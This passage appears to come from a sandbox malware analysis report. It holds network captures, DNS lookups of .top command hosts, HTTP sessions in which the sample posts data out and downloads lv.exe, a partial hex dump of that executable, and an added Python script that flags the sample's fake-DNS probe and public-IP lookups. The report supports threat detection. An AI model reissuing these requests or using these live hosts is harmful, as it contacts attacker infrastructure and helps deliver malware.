                                                                    Sep 28, 2021 15:24:08.931757927 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:08.931886911 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:09.099831104 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099860907 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099879026 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099894047 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099910021 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099920034 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099929094 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099942923 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099971056 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:09.100065947 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268173933 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268224001 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268273115 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268312931 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268316984 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268337011 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268362999 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268364906 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268387079 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268405914 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268409967 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268433094 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268439054 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268454075 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268467903 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268475056 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268477917 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268491983 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268492937 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268528938 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:09.436531067 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436554909 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436564922 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436578989 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436592102 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436609983 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436626911 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436657906 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436677933 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437052011 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437071085 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437151909 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437189102 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437223911 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437252998 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437278032 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437302113 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437326908 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437357903 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:10.087445021 CEST | 80 | 49755 | 104.168.214.97 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:10.087598085 CEST | 49755 | 80 | 192.168.2.7 | 104.168.214.97
                                                                    Sep 28, 2021 15:24:11.096357107 CEST | 49756 | 80 | 192.168.2.7 | 185.185.71.183
                                                                    Sep 28, 2021 15:24:11.146008015 CEST | 80 | 49756 | 185.185.71.183 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:11.146097898 CEST | 49756 | 80 | 192.168.2.7 | 185.185.71.183
                                                                    Sep 28, 2021 15:24:11.146605015 CEST | 49756 | 80 | 192.168.2.7 | 185.185.71.183
                                                                    Sep 28, 2021 15:24:11.239454985 CEST | 80 | 49756 | 185.185.71.183 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:11.297038078 CEST | 80 | 49756 | 185.185.71.183 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:11.297173023 CEST | 49756 | 80 | 192.168.2.7 | 185.185.71.183
                                                                    Sep 28, 2021 15:24:11.297930956 CEST | 49756 | 80 | 192.168.2.7 | 185.185.71.183
                                                                    Sep 28, 2021 15:24:11.300062895 CEST | 49757 | 80 | 192.168.2.7 | 185.185.71.183
                                                                    Sep 28, 2021 15:24:11.347624063 CEST | 80 | 49756 | 185.185.71.183 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:11.348984957 CEST | 80 | 49757 | 185.185.71.183 | 192.168.2.7

                                                                    UDP Packets

                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    --- | --- | --- | --- | ---
                                                                    Sep 28, 2021 15:23:51.557045937 CEST | 55411 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:23:51.578666925 CEST | 53 | 55411 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:06.556492090 CEST | 63668 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:06.664118052 CEST | 53 | 63668 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:08.303037882 CEST | 54640 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:08.320873022 CEST | 53 | 54640 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:08.434087992 CEST | 58739 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:08.758584976 CEST | 53 | 58739 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:10.774172068 CEST | 60338 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:11.094662905 CEST | 53 | 60338 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:23.648773909 CEST | 58717 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:23.666517973 CEST | 53 | 58717 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:28.178381920 CEST | 59762 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:28.197277069 CEST | 53 | 59762 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:29.912893057 CEST | 54329 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:29.940814972 CEST | 53 | 54329 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:33.115497112 CEST | 58052 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:33.146806002 CEST | 53 | 58052 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:43.539726019 CEST | 54008 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:43.573121071 CEST | 53 | 54008 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:45.744656086 CEST | 59451 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:45.765003920 CEST | 53 | 59451 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:46.950778008 CEST | 52914 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:46.982697964 CEST | 53 | 52914 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:47.508183002 CEST | 64569 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:47.527687073 CEST | 53 | 64569 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:47.933339119 CEST | 52816 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:47.953200102 CEST | 53 | 52816 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:48.394443035 CEST | 50781 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:48.413608074 CEST | 53 | 50781 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:48.813858986 CEST | 54230 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:48.832437038 CEST | 53 | 54230 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:49.296349049 CEST | 54911 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:49.315634966 CEST | 53 | 54911 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:50.651793003 CEST | 49958 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:50.669152021 CEST | 53 | 49958 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:50.710241079 CEST | 50860 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:50.727736950 CEST | 53 | 50860 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:51.401048899 CEST | 50452 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:51.420974970 CEST | 53 | 50452 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:51.799473047 CEST | 59730 | 53 | 192.168.2.7 | 8.8.8.8
                                                                    Sep 28, 2021 15:24:51.818702936 CEST | 53 | 59730 | 8.8.8.8 | 192.168.2.7
                                                                    Sep 28, 2021 15:24:51.874804974 CEST5931053192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:51.901767015 CEST53593108.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:58.374469042 CEST5191953192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:58.391902924 CEST53519198.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:25:13.488135099 CEST6429653192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:25:13.507829905 CEST53642968.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:25:33.171108007 CEST5668053192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:25:33.198484898 CEST53566808.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:25:34.060903072 CEST5882053192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:25:34.080854893 CEST53588208.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:25:36.099214077 CEST6098353192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:25:36.126900911 CEST53609838.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:26:00.674165964 CEST4924753192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:26:00.693720102 CEST53492478.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:26:15.793072939 CEST5228653192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:26:15.815259933 CEST53522868.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:26:16.085074902 CEST5606453192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:26:16.121566057 CEST53560648.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:26:18.772794962 CEST6374453192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:26:18.794512033 CEST53637448.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:26:29.894804001 CEST6145753192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:26:29.913731098 CEST53614578.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:27:01.026047945 CEST5836753192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:27:01.046878099 CEST53583678.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:27:45.151653051 CEST6059953192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:27:45.168487072 CEST53605998.8.8.8192.168.2.7

                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 28, 2021 15:24:06.556492090 CEST | 192.168.2.7 | 8.8.8.8 | 0x93d1 | Standard query (0) | pacdpo22.top | A (IP address) | IN (0x0001)
Sep 28, 2021 15:24:08.434087992 CEST | 192.168.2.7 | 8.8.8.8 | 0xb75d | Standard query (0) | moreil02.top | A (IP address) | IN (0x0001)
Sep 28, 2021 15:24:10.774172068 CEST | 192.168.2.7 | 8.8.8.8 | 0xd16e | Standard query (0) | zukelx03.top | A (IP address) | IN (0x0001)
Sep 28, 2021 15:24:23.648773909 CEST | 192.168.2.7 | 8.8.8.8 | 0x967 | Standard query (0) | YWPUxosKSQKjQIKzFVtwgwCR.YWPUxosKSQKjQIKzFVtwgwCR | A (IP address) | IN (0x0001)
Sep 28, 2021 15:26:15.793072939 CEST | 192.168.2.7 | 8.8.8.8 | 0xea84 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001)
Sep 28, 2021 15:26:18.772794962 CEST | 192.168.2.7 | 8.8.8.8 | 0x36ec | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)

                                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 28, 2021 15:24:06.664118052 CEST | 8.8.8.8 | 192.168.2.7 | 0x93d1 | No error (0) | pacdpo22.top | | 45.140.167.227 | A (IP address) | IN (0x0001)
Sep 28, 2021 15:24:08.758584976 CEST | 8.8.8.8 | 192.168.2.7 | 0xb75d | No error (0) | moreil02.top | | 104.168.214.97 | A (IP address) | IN (0x0001)
Sep 28, 2021 15:24:08.758584976 CEST | 8.8.8.8 | 192.168.2.7 | 0xb75d | No error (0) | moreil02.top | | 213.252.245.117 | A (IP address) | IN (0x0001)
Sep 28, 2021 15:24:11.094662905 CEST | 8.8.8.8 | 192.168.2.7 | 0xd16e | No error (0) | zukelx03.top | | 185.185.71.183 | A (IP address) | IN (0x0001)
Sep 28, 2021 15:24:23.666517973 CEST | 8.8.8.8 | 192.168.2.7 | 0x967 | Name error (3) | YWPUxosKSQKjQIKzFVtwgwCR.YWPUxosKSQKjQIKzFVtwgwCR | none | none | A (IP address) | IN (0x0001)
Sep 28, 2021 15:26:15.815259933 CEST | 8.8.8.8 | 192.168.2.7 | 0xea84 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001)
Sep 28, 2021 15:26:18.794512033 CEST | 8.8.8.8 | 192.168.2.7 | 0x36ec | No error (0) | iplogger.org | | 88.99.66.31 | A (IP address) | IN (0x0001)
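
The DNS rows above contain two things worth pulling out automatically: a query for a random, TLD-less name (YWPUxosKSQKjQIKzFVtwgwCR.YWPUxosKSQKjQIKzFVtwgwCR) that came back NXDOMAIN, which is how a sample checks whether the environment fakes DNS by resolving everything, and lookups of ip-api.com and iplogger.org, which the later HTTP sessions use to learn the victim's public IP. The following is an added Python example, not part of the Joe Sandbox report: it pairs queries with answers by transaction ID, builds the resolution map and emits those findings. QUERIES and ANSWERS are constructed from the report's DNS Queries and DNS Answers rows; KNOWN_TLDS is a small constructed subset (use the public suffix list in practice) and IP_LOOKUP_SERVICES lists only the two services seen in this report.

```python
"""Pair DNS queries with answers, build the resolution map, and flag the
fake-DNS probe and public-IP lookups visible in a sandbox DNS log.
Added example; QUERIES/ANSWERS are constructed from the report's DNS rows."""
import math
from collections import Counter
from typing import NamedTuple, Optional


class DnsQuery(NamedTuple):
    txid: int
    name: str


class DnsAnswer(NamedTuple):
    txid: int
    rcode: int              # 0 = NOERROR, 3 = NXDOMAIN
    address: Optional[str]  # None when the reply carries no A record


PROBE = "YWPUxosKSQKjQIKzFVtwgwCR.YWPUxosKSQKjQIKzFVtwgwCR"

QUERIES = [  # constructed from the report's "DNS Queries" table
    DnsQuery(0x93d1, "pacdpo22.top"),
    DnsQuery(0xb75d, "moreil02.top"),
    DnsQuery(0xd16e, "zukelx03.top"),
    DnsQuery(0x967, PROBE),
    DnsQuery(0xea84, "ip-api.com"),
    DnsQuery(0x36ec, "iplogger.org"),
]
ANSWERS = [  # constructed from the report's "DNS Answers" table
    DnsAnswer(0x93d1, 0, "45.140.167.227"),
    DnsAnswer(0xb75d, 0, "104.168.214.97"),
    DnsAnswer(0xb75d, 0, "213.252.245.117"),
    DnsAnswer(0xd16e, 0, "185.185.71.183"),
    DnsAnswer(0x967, 3, None),
    DnsAnswer(0xea84, 0, "208.95.112.1"),
    DnsAnswer(0x36ec, 0, "88.99.66.31"),
]

# Constructed subset; a real detector should consult the public suffix list.
KNOWN_TLDS = {"com", "net", "org", "top", "info", "xyz", "ru", "io"}
# Services this report's processes used to learn the victim's public IP.
IP_LOOKUP_SERVICES = {"ip-api.com", "iplogger.org"}
NXDOMAIN = 3


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def looks_random(name: str) -> bool:
    """A TLD-less name, or a long high-entropy mixed-case label, is a generated probe."""
    labels = name.split(".")
    first = labels[0]
    mixed = any(c.isupper() for c in first) and any(c.islower() for c in first)
    no_tld = labels[-1].lower() not in KNOWN_TLDS
    return no_tld or (len(first) >= 16 and mixed and shannon_entropy(first) > 3.5)


def analyze_dns(queries, answers) -> dict:
    by_txid = {}
    for a in answers:
        by_txid.setdefault(a.txid, []).append(a)
    resolved, findings = {}, []
    for q in queries:
        replies = by_txid.get(q.txid, [])
        addrs = [a.address for a in replies if a.address]
        if addrs:
            resolved[q.name] = addrs
        if looks_random(q.name):
            if any(a.rcode == NXDOMAIN for a in replies):
                # Real resolver behaviour: the sample concludes it is not in a fake-DNS sandbox.
                findings.append((q.name, "nxdomain_probe"))
            elif addrs:
                # Every name resolves: the sample would detect a simulated network here.
                findings.append((q.name, "fake_dns_detected"))
            else:
                findings.append((q.name, "unanswered_probe"))
        if q.name.lower() in IP_LOOKUP_SERVICES:
            findings.append((q.name, "public_ip_lookup"))
    return {"resolved": resolved, "findings": findings}


if __name__ == "__main__":
    for name, kind in analyze_dns(QUERIES, ANSWERS)["findings"]:
        print(f"{kind:20} {name}")
```

The resolution map is the part to feed into blocklists (the .top hosts and their addresses); the nxdomain_probe finding is the part that tells you why the sample went on to contact its C2 at all, since an environment that answered the random name would have been flagged as a sandbox.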

                                                                    HTTP Request Dependency Graph

                                                                    • iplogger.org
                                                                    • pacdpo22.top
                                                                    • moreil02.top
                                                                    • zukelx03.top
                                                                    • ip-api.com

                                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49849 | 88.99.66.31 | 443 | C:\Windows\SysWOW64\wscript.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49752 | 45.140.167.227 | 80 | C:\Users\user\Desktop\7yyqdBJVGf.exe
Timestamp | kBytes transferred | Direction | Data
Sep 28, 2021 15:24:06.751216888 CEST | 836 | OUT | POST /index.php HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=---------------------------
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                    Host: pacdpo22.top
                                                                    Content-Length: 73148
                                                                    Cache-Control: no-cache
Sep 28, 2021 15:24:06.990432024 CEST | 909 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                    Date: Tue, 28 Sep 2021 13:24:06 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 36
                                                                    Connection: close
                                                                    ETag: W/"24-dqOYQ6lgKdJu+elnBEH9LXSF3AM"
                                                                    Data Raw: 63 33 39 61 34 31 30 32 2d 35 62 33 65 2d 34 66 62 34 2d 61 39 33 31 2d 34 35 38 36 39 39 62 33 36 64 39 36
                                                                    Data Ascii: c39a4102-5b3e-4fb4-a931-458699b36d96


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.7 | 49755 | 104.168.214.97 | 80 | C:\Users\user\Desktop\7yyqdBJVGf.exe
Timestamp | kBytes transferred | Direction | Data
Sep 28, 2021 15:24:08.931358099 CEST | 932 | OUT | POST /index.php HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=---------------------------
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                    Host: moreil02.top
                                                                    Content-Length: 73136
                                                                    Cache-Control: no-cache
Sep 28, 2021 15:24:10.087445021 CEST | 1006 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Tue, 28 Sep 2021 13:24:09 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 36
                                                                    Connection: keep-alive
                                                                    ETag: W/"24-hadwo3lSsMMDn1mDvveoEjCw6v0"
                                                                    Data Raw: 38 62 31 63 61 66 63 31 2d 64 36 35 39 2d 34 38 33 34 2d 61 62 32 36 2d 39 38 32 63 38 37 31 62 61 38 37 36
                                                                    Data Ascii: 8b1cafc1-d659-4834-ab26-982c871ba876


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.7 | 49756 | 185.185.71.183 | 80 | C:\Users\user\Desktop\7yyqdBJVGf.exe
Timestamp | kBytes transferred | Direction | Data
Sep 28, 2021 15:24:11.146605015 CEST | 1007 | OUT | GET /download.php?file=lv.exe HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                    Host: zukelx03.top
                                                                    Connection: Keep-Alive
Sep 28, 2021 15:24:11.297038078 CEST | 1007 | IN | HTTP/1.1 302 Found
                                                                    Date: Tue, 28 Sep 2021 13:24:11 GMT
                                                                    Server: Apache/2.2.22 (@RELEASE@)
                                                                    X-Powered-By: PHP/5.3.3
                                                                    Location: downfiles/lv.exe
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.7 | 49757 | 185.185.71.183 | 80 | C:\Users\user\Desktop\7yyqdBJVGf.exe
Timestamp | kBytes transferred | Direction | Data
Sep 28, 2021 15:24:11.349715948 CEST | 1008 | OUT | GET /downfiles/lv.exe HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                    Host: zukelx03.top
                                                                    Connection: Keep-Alive
Sep 28, 2021 15:24:11.483042002 CEST | 1009 | IN | HTTP/1.1 200 OK
                                                                    Date: Tue, 28 Sep 2021 13:24:11 GMT
                                                                    Server: Apache/2.2.22 (@RELEASE@)
                                                                    Last-Modified: Tue, 28 Sep 2021 09:56:00 GMT
                                                                    ETag: "380018-44fbf6-5cd0b38838d02"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 4520950
                                                                    Connection: close
                                                                    Content-Type: application/octet-stream
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 17 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 16 00 18 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 0e 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 18 ef 00 00 00 00 16 00 00 f0 00 00 00 a6 00 00 
